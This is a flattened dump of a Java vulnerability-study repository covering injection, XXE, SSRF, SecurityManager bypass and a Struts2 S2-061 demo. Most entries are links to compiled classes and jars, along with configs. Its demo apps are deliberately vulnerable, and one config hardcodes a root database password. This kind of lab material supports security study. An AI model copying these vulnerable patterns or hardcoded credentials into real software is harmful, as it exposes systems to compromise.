https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 10 | 13 | 16 | 19 | 20 | 21 | 22 | 25 | 28 | 34 | 37 | 49 | -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class -------------------------------------------------------------------------------- /owasp/target/classes/hibernate.cfg.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | thread 10 | 11 | com.mysql.cj.jdbc.Driver 12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC 13 | root 14 | 1qazXSW@3edc 15 | 16 | 17 | true 18 | 19 | true 20 | 21 | 22 | org.hibernate.dialect.MySQLDialect 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /owasp/target/classes/mybatis-config.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /owasp/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | com\r17a\commonvuln\injection\sqli\hibernate\pojo\User.class 2 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByReflection.class 3 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy$1.class 4 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest.class 5 | com\r17a\commonvuln\injection\sqli\mybatis\pojo\User.class 6 | com\r17a\commonvuln\injection\command\ProcessCmdInject.class 7 | com\r17a\commonvuln\injection\sqli\nativesql\NativeSqli.class 8 | com\r17a\commonvuln\securitymissconfig\xxe\SAXTransformerFactoryXXE.class 9 | com\r17a\commonvuln\file\FileDelete.class 10 | com\r17a\commonvuln\securitymissconfig\xxe\SAXHandel.class 11 | com\r17a\commonvuln\injection\expression\ognl\bean\Student.class 12 | com\r17a\commonvuln\securitymissconfig\xxe\DocumentBuilderXXE.class 13 | com\r17a\commonvuln\securitymissconfig\securitymanager\Evil.class 14 | com\r17a\commonvuln\injection\redirect\UrlRedirect.class 15 | com\r17a\commonvuln\injection\sqli\hibernate\HibernateSqli.class 16 | com\r17a\commonvuln\securitymissconfig\securitymanager\SetSecurityManagerNullBypass.class 17 | com\r17a\commonvuln\injection\expression\mvel\MvelTest.class 18 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy.class 19 | com\r17a\commonvuln\injection\sqli\mybatis\MybatisSqli.class 20 | com\r17a\commonvuln\file\FileUnzip.class 21 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\CreatePolicy.class 22 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByClassloader.class 23 | com\r17a\commonvuln\injection\expression\ognl\bean\SchoolMaster.class 24 | com\r17a\commonvuln\securitymissconfig\securitymanager\MyClassLoader.class 25 | com\r17a\commonvuln\securitymissconfig\xxe\Payloads.class 26 | com\r17a\commonvuln\injection\sqli\mybatis\utils\MybatisUtils.class 27 | com\r17a\commonvuln\injection\expression\spel\SpelTest.class 28 | com\r17a\commonvuln\injection\sqli\jdbc\JdbcSqli.class 29 | com\r17a\commonvuln\file\FileUploadOrDownload.class 30 | com\r17a\commonvuln\securitymissconfig\xxe\SAXBuilderXXE.class 31 | com\r17a\commonvuln\cors\Cors.class 32 | com\r17a\commonvuln\ssrf\Ssrf.class 33 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest$1.class 34 | com\r17a\commonvuln\securitymissconfig\xxe\SAXReadXXE.class 35 | com\r17a\commonvuln\securitymissconfig\xxe\XXE.class 36 | com\r17a\commonvuln\injection\command\RuntimeCmdInject.class 37 | com\r17a\commonvuln\injection\expression\ognl\bean\School.class 38 | com\r17a\commonvuln\securitymissconfig\xxe\TransformerFactoryXXE.class 39 | com\r17a\commonvuln\injection\sqli\hibernate\utils\HibernateUtils.class 40 | com\r17a\commonvuln\securitymissconfig\xxe\SAXParserFactoryXXE.class 41 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.r17a 8 | JavaVulnSummary 9 | pom 10 | 1.0-SNAPSHOT 11 | 12 | fastjson 13 | jenkins 14 | jndi 15 | ysoserial 16 | weblogic 17 | xstream 18 | owasp 19 | common 20 | struts2 21 | confluence 22 | jboss 23 | log4j 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /struts2/src/main/java/com/r17a/action/IndexAction.java: -------------------------------------------------------------------------------- 1 | package com.r17a.action; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | /** 6 | * 本实验代码参考vulhub 7 | * TODO config tomcat 8 | * */ 9 | public class IndexAction extends ActionSupport { 10 | 11 | private String id; 12 | 13 | 14 | public String changeId(){ 15 | return SUCCESS; 16 | } 17 | 18 | public String getId() { 19 | return id; 20 | } 21 | 22 | public void setId(String id) { 23 | this.id = id; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /struts2/src/main/resources/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | -------------------------------------------------------------------------------- /struts2/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | struts2 8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter 9 | 10 | 11 | struts2 12 | /* 13 | 14 | -------------------------------------------------------------------------------- /struts2/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | language="java" 3 | contentType="text/html; charset=UTF-8" 4 | pageEncoding="UTF-8" %> 5 | <%@ taglib prefix="s" uri="/struts-tags" %> 6 | 7 | 8 | 9 | S2-061 demo 10 | 11 | 12 | 13 | your input id: ${id} 14 |
has ben evaluated again in id attribute 15 | 16 | 17 | -------------------------------------------------------------------------------- /struts2/target/classes/com/r17a/action/IndexAction.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/classes/com/r17a/action/IndexAction.class -------------------------------------------------------------------------------- /struts2/target/classes/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | -------------------------------------------------------------------------------- /struts2/target/struts2.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2.war -------------------------------------------------------------------------------- /struts2/target/struts2/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: IntelliJ IDEA 3 | Built-By: 29176 4 | Build-Jdk: 1.8.0_181 5 | 6 | -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/classes/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | struts2 8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter 9 | 10 | 11 | struts2 12 | /* 13 | 14 | -------------------------------------------------------------------------------- /struts2/target/struts2/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | language="java" 3 | contentType="text/html; charset=UTF-8" 4 | pageEncoding="UTF-8" %> 5 | <%@ taglib prefix="s" uri="/struts-tags" %> 6 | 7 | 8 | 9 | S2-061 demo 10 | 11 | 12 | 13 | your input id: ${id} 14 |
has ben evaluated again in id attribute 15 | 16 | 17 | -------------------------------------------------------------------------------- /weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-20.12.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-20.12.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-management-20.12.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-management-20.12.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-rest.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-rest.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-web.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-web.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/eclipselink.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/eclipselink.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-api-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-api-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-locator-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-locator-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-utils-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-utils-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-annotations-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-annotations-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-core-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-core-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-databind-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-databind-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.activation-1.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-1.2.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.inject-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.inject-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar: 